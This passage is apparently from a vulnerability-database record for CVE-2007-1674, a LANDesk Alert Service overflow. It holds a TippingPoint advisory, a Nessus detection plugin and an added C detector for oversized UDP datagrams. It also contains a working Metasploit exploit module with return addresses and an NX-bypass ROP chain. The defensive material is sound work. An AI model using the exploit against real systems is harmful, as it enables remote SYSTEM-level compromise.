By sending\r\n\t\t\t\tan overly long string to the Alert Service, a buffer is overwritten and arbitrary\r\n\t\t\t\tcode can be executed.\r\n\t\t\t},\r\n\t\t\t'Author' => 'MC',\r\n\t\t\t'Version' => '$Revision: 9262 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['CVE', '2007-1674'],\r\n\t\t\t\t\t['OSVDB', '34964'],\r\n\t\t\t\t\t['URL', 'http://www.tippingpoint.com/security/advisories/TSRT-07-04.html'],\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'thread',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 336,\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t# Aolnsrvr 4.0\r\n\t\t\t\t\t[ 'Alerting Proxy 2000/2003/XP', { 'Ret' => 0x00423554 } ],\r\n\t\t\t\t\t[ 'Alerting Proxy 2003 SP1-2 (NX support)', { 'IB' => 0x00400000, 'ProcessInfo' => 0xed } ],\r\n\t\t\t\t\t[ 'Alerting Proxy XP SP2 (NX support)', { 'IB' => 0x00400000, 'ProcessInfo' => 0xe4 } ],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'DisclosureDate' => 'Apr 13 2007'))\r\n\r\n\t\tregister_options([Opt::RPORT(65535)], self.class)\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tconnect_udp\r\n\r\n\t\tif (target.name =~ /NX/)\r\n\t\t\ttxt = Rex::Text.rand_text_alphanumeric(1024)\r\n\r\n\t\t\tib = target['IB']\r\n\r\n\t\t\t# to bypass NX we need to emulate the call to ZwSetInformationProcess\r\n\t\t\t# with generic value (to work on 2k3 SP1-SP2 - XP SP2)\r\n\r\n\r\n\t\t\t# first we set esi to 0xed by getting the value on the stack\r\n\t\t\t#\r\n\t\t\t# 0x00401b46:\r\n\t\t\t# pop esi <- esi = edh\r\n\t\t\t# retn\r\n\r\n\t\t\ttxt[ 280, 4 ] = [ib + 0x1b46].pack('V')\r\n\t\t\ttxt[ 296, 4] = [0xed].pack('V')\r\n\r\n\t\t\t# now we set ecx to 0x7ffe0300, eax to 0xed\r\n\t\t\t# 0x00401b43:\r\n\t\t\t# pop ecx <- ecx = 0x7ffe0300 - 0xFF0\r\n\t\t\t# mov eax, esi <- eax == edh\r\n\t\t\t# pop esi <- 0x45b4ea (data section)\r\n\t\t\t# 
retn\r\n\r\n\t\t\ttxt[ 300, 4] = [ib + 0x1b43].pack('V')\r\n\t\t\ttxt[ 304, 4] = [0x7ffe0300 - 0xff0].pack('V')\r\n\t\t\ttxt[ 308, 4] = [ib + 0x5b4ea].pack('V')\r\n\r\n\t\t\t# we set edx to 0x7FFe300 (ecx + 0xff0)\r\n\t\t\t# 0x004106b1:\r\n\t\t\t# lea edx, [ecx+0ff0h]\r\n\t\t\t# mov [esi+4], edx\r\n\t\t\t# mov [esi+8], edi\r\n\t\t\t# pop edi\r\n\t\t\t# mov [esi+0Ch], eax\r\n\t\t\t# pop esi\r\n\t\t\t# retn\r\n\r\n\t\t\ttxt[ 312, 4] = [ib + 0x106b1].pack('V')\r\n\r\n\r\n\t\t\t# finally we call NtSetInformationProcess (-1, target['ProcessInfo'], ib+0x4ec84, 4)\r\n\t\t\t# 0x0044ec84 is a pointer to 0x2 to disable NX\r\n\t\t\t# 0x0042a28e:\r\n\t\t\t# call dword ptr [edx]\r\n\t\t\t# mov esi, eax\r\n\t\t\t# mov eax, esi\r\n\t\t\t# pop edi\r\n\t\t\t# pop esi\r\n\t\t\t# pop ebp\r\n\t\t\t# pop ebx\r\n\t\t\t# add esp, 134h\r\n\t\t\t# retn 1Ch\r\n\r\n\t\t\ttxt[ 324, 4] = [ib + 0x2a28e].pack('V') # call dword ptr[ecx]\r\n\t\t\ttxt[ 332, 16] = [-1, 34, 0x0044ec84, 4].pack('VVVV')\r\n\r\n\t\t\t# we catch the second exception to go back to our shellcode, now that\r\n\t\t\t# NX is disabled\r\n\r\n\t\t\ttxt[ 652, 4 ] = [ib + 0x23554].pack('V') # (jmp esp in atl.dll)\r\n\t\t\ttxt[ 684, payload.encoded.length ] = payload.encoded\r\n\r\n\t\telse\r\n\t\t\t# One-shot overwrite =(\r\n\t\t\ttxt = rand_text_alphanumeric(280) + [target.ret].pack('V') + payload.encoded\r\n\t\tend\r\n\r\n\t\tprint_status(\"Trying target #{target.name}...\")\r\n\r\n\t\tudp_sock.put(txt)\r\n\r\n\t\thandler(udp_sock)\r\n\t\tdisconnect_udp\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16457/"}], "securityvulns": [{"lastseen": "2018-08-31T11:09:25", "bulletinFamily": "software", "cvelist": ["CVE-2007-1674"], "description": "UDP/65535 alert service bufer overflow.", "edition": 1, "modified": "2007-04-14T00:00:00", "published": "2007-04-14T00:00:00", "id": "SECURITYVULNS:VULN:7581", "href": 
"https://vulners.com/securityvulns/SECURITYVULNS:VULN:7581", "title": "LANDesk Management Suite buffer overflow", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:21", "bulletinFamily": "software", "cvelist": ["CVE-2007-1674"], "description": "TSRT-07-04: LANDesk Management Suite Alert Service Stack Overflow\r\n Vulnerability\r\nhttp://www.tippingpoint.com/security/advisories/TSRT-07-04.html\r\nApril 13, 2007\r\n\r\n-- CVE ID:\r\nCVE-2007-1674\r\n\r\n-- Affected Vendor:\r\nLANDesk\r\n\r\n-- Affected Products:\r\nManagement Suite 8.7\r\n\r\n-- TippingPoint(TM) IPS Customer Protection:\r\nTippingPoint IPS customers have been protected against this\r\nvulnerability since March 23, 2007 by Digital Vaccine protection\r\nfilter ID 5210. For further product information on the TippingPoint IPS:\r\n\r\n http://www.tippingpoint.com \r\n\r\n-- Vulnerability Details:\r\nThis vulnerability allows attackers to execute arbitrary code on\r\nvulnerable installations of LANDesk Management Suite. User interaction\r\nis not required to exploit this vulnerability.\r\n\r\nThe specific flaw exists in the Alert Service listening on UDP port\r\n65535. The Aolnsrvr.exe process accepts user-supplied data and performs\r\nan inline memory copy into a 268 byte stack-based buffer. Supplying\r\nadditional data results in a buffer overflow and SEH overwrite. The\r\nvulnerable memory copy is shown here:\r\n\r\n 0041EF49 mov edi, eax ; edi pointer to stack buffer\r\n 0041EF4B mov eax, ecx\r\n 0041EF4D shr ecx, 2 ; total size of data\r\n 0041EF50 rep movsd\r\n 0041EF52 mov ecx, eax\r\n 0041EF54 mov eax, ebx\r\n 0041EF56 and ecx, 3\r\n 0041EF59 rep movsb\r\n\r\nExploitation allows an attacker to execute arbitrary code under the\r\ncontext of the SYSTEM user.\r\n\r\n-- Vendor Response:\r\nLANDesk has issued an update to correct this vulnerability. 
More details\r\ncan be found at:\r\n\r\nhttp://kb.landesk.com/display/4n/kb/article.asp?aid=4142\r\n\r\n-- Disclosure Timeline:\r\n2007.03.08 - Vulnerability reported to vendor\r\n2007.03.23 - Digital Vaccine released to TippingPoint customers\r\n2007.04.13 - Coordinated public release of advisory\r\n\r\n-- Credit:\r\nThis vulnerability was discovered by Aaron Portnoy, TippingPoint\r\nSecurity Research Team.\r\n", "edition": 1, "modified": "2007-04-14T00:00:00", "published": "2007-04-14T00:00:00", "id": "SECURITYVULNS:DOC:16707", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:16707", "title": "TSRT-07-04: LANDesk Management Suite Alert Service Stack Overflow Vulnerability", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2021-04-01T03:35:00", "description": "LANDesk Management Suite, used to automate system and security\nmanagement tasks, is installed on the remote host.\n\nThe version of LANDesk Management Suite includes an instance of Intel\nPro Alerting Proxy, which contains a stack-based buffer overflow\nvulnerability. 
An attacker may be able to leverage this issue by\nconnecting to it over UDP port 65535 and sending sufficient data to\noverflow a 268 byte stack-based buffer to execute arbitrary code with\nLOCAL SYSTEM privileges.", "edition": 27, "published": "2007-04-24T00:00:00", "title": "LANDesk Management Suite Alert Service (aolnsrvr.exe) Remote Overflow", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-1674"], "modified": "2021-04-02T00:00:00", "cpe": [], "id": "LANDESK_AOLNSRVR_OVERFLOW.NASL", "href": "https://www.tenable.com/plugins/nessus/25085", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(25085);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2018/11/15 20:50:27\");\n\n script_cve_id(\"CVE-2007-1674\");\n script_bugtraq_id(23483);\n\n script_name(english:\"LANDesk Management Suite Alert Service (aolnsrvr.exe) Remote Overflow\");\n script_summary(english:\"Checks for Intel Pro Alerting Proxy\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has an application that is affected by a\nbuffer overflow vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"LANDesk Management Suite, used to automate system and security\nmanagement tasks, is installed on the remote host.\n\nThe version of LANDesk Management Suite includes an instance of Intel\nPro Alerting Proxy, which contains a stack-based buffer overflow\nvulnerability. 
An attacker may be able to leverage this issue by\nconnecting to it over UDP port 65535 and sending sufficient data to\noverflow a 268 byte stack-based buffer to execute arbitrary code with\nLOCAL SYSTEM privileges.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.tippingpoint.com/security/advisories/TSRT-07-04.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2007/Apr/211\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the latest Service Pack followed by hotfix INST-11050687.2.zip\nor remove the Intel Pro Alerting Proxy software.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'LANDesk Management Suite 8.7 Alert Service Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/04/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/04/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/04/24\");\n\nscript_set_attribute(attribute:\"plugin_type\", value:\"local\");\nscript_end_attributes();\n\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2007-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\n\ninclude(\"smb_func.inc\");\ninclude(\"audit.inc\");\n\n\n# Connect to the appropriate share.\nif 
(!get_kb_item(\"SMB/Registry/Enumerated\")) exit(0);\n\nname = kb_smb_name();\nport = kb_smb_transport();\n\nlogin = kb_smb_login();\npass = kb_smb_password();\ndomain = kb_smb_domain();\n\n\n\nif(! smb_session_init()) audit(AUDIT_FN_FAIL, 'smb_session_init');\nrc = NetUseAdd(login:login, password:pass, domain:domain, share:\"IPC$\");\nif (rc != 1)\n{\n NetUseDel();\n exit(0);\n}\n\n\n# Connect to remote registry.\nhklm = RegConnectRegistry(hkey:HKEY_LOCAL_MACHINE);\nif (isnull(hklm))\n{\n NetUseDel();\n exit(0);\n}\n\n\n# Get some info about the install.\nlandesk = NULL;\npath = NULL;\n\nkey = \"SOFTWARE\\LANDesk\\ManagementSuite\\Setup\";\nkey_h = RegOpenKey(handle:hklm, key:key, mode:MAXIMUM_ALLOWED);\nif (!isnull(key_h))\n{\n # If LANDesk is installed...\n item = RegQueryValue(handle:key_h, item:\"LdmainPath\");\n if (!isnull(item))\n {\n # Figure out where Alerting Proxy is installed.\n key2 = \"SOFTWARE\\INTEL\\Alert on LAN\\Proxy\";\n key2_h = RegOpenKey(handle:hklm, key:key2, mode:MAXIMUM_ALLOWED);\n if (!isnull(key2_h))\n {\n item = RegQueryValue(handle:key2_h, item:\"ImagePath\");\n if (!isnull(item))\n {\n path = item[1];\n path = ereg_replace(pattern:\"^(.+)\\\\$\", replace:\"\\1\", string:path);\n }\n RegCloseKey(handle:key2_h);\n }\n }\n RegCloseKey(handle:key_h);\n}\nRegCloseKey(handle:hklm);\n\n\n# If it is...\nif (path)\n{\n # Make sure the executable exists.\n share = ereg_replace(pattern:\"^([A-Za-z]):.*\", replace:\"\\1$\", string:path);\n exe = ereg_replace(pattern:\"^[A-Za-z]:(.*)\", replace:\"\\1\\Aolnsrvr.exe\", string:path);\n NetUseDel(close:FALSE);\n\n rc = NetUseAdd(login:login, password:pass, domain:domain, share:share);\n if (rc != 1)\n {\n NetUseDel();\n exit(0);\n }\n\n fh = CreateFile(\n file:exe,\n desired_access:GENERIC_READ,\n file_attributes:FILE_ATTRIBUTE_NORMAL,\n share_mode:FILE_SHARE_READ,\n create_disposition:OPEN_EXISTING\n );\n if (!isnull(fh))\n {\n CloseFile(handle:fh);\n\n # nb: the patch removes the affected 
software.\n report = string(\n \"The LANDesk Management Suite Alert Service is installed under :\\n\",\n \"\\n\",\n \" \", path, \"\\n\"\n );\n security_hole(port:port, extra:report);\n }\n}\n\n\n# Clean up.\nNetUseDel();\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
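The Nessus plugin above is a local check: it reads the LANDesk and Intel "Alert on LAN" registry keys over SMB and reports if Aolnsrvr.exe is still on disk, since the hotfix removes it. For hosts you cannot authenticate to, the same advisory facts (UDP port 65535, a 268-byte buffer) translate into a network-side check. The C below is an added example, not Tenable's, LANDesk's or Metasploit's code: it parses a raw IPv4/UDP packet with no link-layer header, validates the length fields against the bytes actually present, and flags any datagram to 65535/udp whose payload is longer than the buffer. The sample packets, including the 192.168.1.x addresses, are constructed inline rather than captured.

```c
/* Added example (not from the page): network-side check for the TSRT-07-04
 * condition. Parses raw IPv4/UDP and flags oversized datagrams to 65535/udp.
 * Sample packets are constructed, not captured. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define ALERT_PORT      65535u
#define ALERT_BUF_SIZE  268u
#define PROTO_UDP       17u

enum verdict { V_NOT_IPV4_UDP = 0, V_OTHER_PORT, V_BENIGN, V_OVERSIZED };

static uint16_t be16(const unsigned char *p)
{
    return (uint16_t)((p[0] << 8) | p[1]);
}

/* Classify one packet. Header length fields are checked against the bytes
 * present, so a truncated or lying header is reported as not-IPv4/UDP rather
 * than trusted. On any UDP verdict *dport and *payload_len are filled in. */
enum verdict classify_packet(const unsigned char *pkt, size_t len,
                             uint16_t *dport, size_t *payload_len)
{
    if (len < 20 || (pkt[0] >> 4) != 4)
        return V_NOT_IPV4_UDP;
    size_t ihl = (size_t)(pkt[0] & 0x0f) * 4;
    size_t total = be16(pkt + 2);
    if (ihl < 20 || total < ihl + 8 || total > len || pkt[9] != PROTO_UDP)
        return V_NOT_IPV4_UDP;
    const unsigned char *udp = pkt + ihl;
    size_t udp_len = be16(udp + 4);
    if (udp_len < 8 || udp_len > total - ihl)
        return V_NOT_IPV4_UDP;
    *dport = be16(udp + 2);
    *payload_len = udp_len - 8;
    if (*dport != ALERT_PORT)
        return V_OTHER_PORT;
    return *payload_len > ALERT_BUF_SIZE ? V_OVERSIZED : V_BENIGN;
}

/* Construct an IPv4/UDP packet with the given destination port and payload
 * length (payload filled with 'A'). Checksums are left zero; classification
 * does not need them. Returns total length, or 0 if out is too small. */
size_t build_udp_packet(unsigned char *out, size_t cap,
                        uint16_t dport, size_t payload_len)
{
    size_t total = 20 + 8 + payload_len;
    if (cap < total || total > 0xffff)
        return 0;
    memset(out, 0, total);
    out[0] = 0x45;                               /* IPv4, IHL = 5 */
    out[2] = (unsigned char)(total >> 8);
    out[3] = (unsigned char)total;
    out[8] = 64;                                 /* TTL */
    out[9] = PROTO_UDP;
    memcpy(out + 12, "\xc0\xa8\x01\x0a", 4);     /* 192.168.1.10 (constructed) */
    memcpy(out + 16, "\xc0\xa8\x01\x14", 4);     /* 192.168.1.20 (constructed) */
    out[20] = 0xc3; out[21] = 0x50;              /* source port 50000 */
    out[22] = (unsigned char)(dport >> 8);
    out[23] = (unsigned char)dport;
    out[24] = (unsigned char)((8 + payload_len) >> 8);
    out[25] = (unsigned char)(8 + payload_len);
    memset(out + 28, 'A', payload_len);
    return total;
}

/* Build one packet and classify it. */
enum verdict classify_constructed(uint16_t dport, size_t payload_len)
{
    unsigned char pkt[2048];
    uint16_t dp; size_t pl;
    size_t n = build_udp_packet(pkt, sizeof pkt, dport, payload_len);
    return n ? classify_packet(pkt, n, &dp, &pl) : V_NOT_IPV4_UDP;
}

/* A 1024-byte-payload packet of which only 40 bytes arrived: the IP total
 * length claims more than is present, so it must not be classified. */
enum verdict classify_truncated(void)
{
    unsigned char pkt[2048];
    uint16_t dp; size_t pl;
    build_udp_packet(pkt, sizeof pkt, ALERT_PORT, 1024);
    return classify_packet(pkt, 40, &dp, &pl);
}

int main(void)
{
    static const char *names[] = { "not-ipv4/udp", "other-port", "benign", "OVERSIZED" };
    struct { uint16_t dport; size_t plen; } cases[] = {
        { 65535, 100 }, { 65535, 268 }, { 65535, 284 }, { 65535, 1024 }, { 161, 1024 },
    };
    for (size_t i = 0; i < sizeof cases / sizeof cases[0]; i++)
        printf("dport=%5u payload=%4zu -> %s\n", cases[i].dport, cases[i].plen,
               names[classify_constructed(cases[i].dport, cases[i].plen)]);
    printf("truncated capture -> %s\n", names[classify_truncated()]);
    return 0;
}
```

Treat the 268-byte threshold as a coarse heuristic rather than a signature: the advisory says the service copies "user-supplied data" into the buffer but not which part of the datagram, so legitimate alert traffic longer than 268 bytes cannot be ruled out from the page alone. It does cover the public exploit, whose one-shot target sends at least 284 bytes (280 bytes of filler, the return address, then the payload) and whose NX-bypass targets send 1024. The 284 case in main marks that minimum.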